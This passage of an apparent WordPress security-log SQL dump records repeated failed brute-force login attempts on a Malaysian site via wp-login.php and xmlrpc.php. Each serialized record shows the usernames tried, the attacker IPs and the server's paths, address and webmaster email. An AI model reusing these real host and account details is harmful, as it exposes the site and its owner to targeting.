empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"150.95.109.77\";s:11:\"REMOTE_PORT\";s:5:\"54054\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPJYTzAXRCh@i15RK09YwAAAMc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566820705.3945\";s:12:\"REQUEST_TIME\";s:10:\"1566820705\";}}','notice','2019-08-26 11:58:28','2019-08-26 11:58:26',18196528,19495192,'https://bintara.com.my/xmlrpc.php',1,0,'150.95.109.77'),(23129,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.53.231.29\";s:11:\"REMOTE_PORT\";s:5:\"34992\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPOAXxaD7qVX4VJuZ-@xQAAAA8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566821889.7014\";s:12:\"REQUEST_TIME\";s:10:\"1566821889\";}}','notice','2019-08-26 12:18:11','2019-08-26 12:18:10',17683712,19173840,'https://bintara.com.my/wp-login.php',1,0,'103.53.231.29'),(23130,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.53.231.29\";s:11:\"REMOTE_PORT\";s:5:\"35422\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPOBMc7g4l7i3TBndWhcAAAAFQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566821893.0291\";s:12:\"REQUEST_TIME\";s:10:\"1566821893\";}}','notice','2019-08-26 12:18:14','2019-08-26 12:18:13',18196528,19495192,'https://bintara.com.my/xmlrpc.php',1,0,'103.53.231.29'),(23131,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"202.28.110.204\";s:11:\"REMOTE_PORT\";s:5:\"36168\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPQfDzAXRCh@i15RK093AAAANU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566822524.5202\";s:12:\"REQUEST_TIME\";s:10:\"1566822524\";}}','notice','2019-08-26 12:28:45','2019-08-26 12:28:44',17683416,19174616,'https://bintara.com.my/wp-login.php',1,0,'202.28.110.204'),(23132,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"35.243.189.231\";s:11:\"REMOTE_PORT\";s:5:\"49612\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPSY8c7g4l7i3TBndWjUQAAAE4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566823011.2095\";s:12:\"REQUEST_TIME\";s:10:\"1566823011\";}}','notice','2019-08-26 12:36:52','2019-08-26 12:36:51',17687144,19173192,'https://bintara.com.my/wp-login.php',1,0,'35.243.189.231'),(23133,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"35.243.189.231\";s:11:\"REMOTE_PORT\";s:5:\"49612\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPSY8c7g4l7i3TBndWjUQAAAE4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566823011.2095\";s:12:\"REQUEST_TIME\";s:10:\"1566823011\";}}','notice','2019-08-26 12:36:53','2019-08-26 12:36:51',17848208,19173192,'https://bintara.com.my/wp-login.php',1,0,'35.243.189.231'),(23134,0,'brute_force','invalid-login::username-xrumertest','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:10:\"xrumertest\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"478\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"35.243.189.231\";s:11:\"REMOTE_PORT\";s:5:\"50114\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPSZUlLQKVpx7Mms7vKUAAAAcI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566823014.0504\";s:12:\"REQUEST_TIME\";s:10:\"1566823014\";}}','notice','2019-08-26 12:36:55','2019-08-26 12:36:54',18199160,19497656,'https://bintara.com.my/xmlrpc.php',1,0,'35.243.189.231'),(23135,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"123.31.43.162\";s:11:\"REMOTE_PORT\";s:5:\"49738\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPU3Mc7g4l7i3TBndWkfwAAAEg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566823644.7976\";s:12:\"REQUEST_TIME\";s:10:\"1566823644\";}}','notice','2019-08-26 12:47:26','2019-08-26 12:47:25',17683688,19174936,'https://bintara.com.my/wp-login.php',1,0,'123.31.43.162'),(23136,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"123.31.43.162\";s:11:\"REMOTE_PORT\";s:5:\"49982\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWPU3klLQKVpx7Mms7vKjAAAAdU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566823646.9558\";s:12:\"REQUEST_TIME\";s:10:\"1566823646\";}}','notice','2019-08-26 12:47:28','2019-08-26 12:47:27',18198992,19495208,'https://bintara.com.my/xmlrpc.php',1,0,'123.31.43.162'),(23137,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 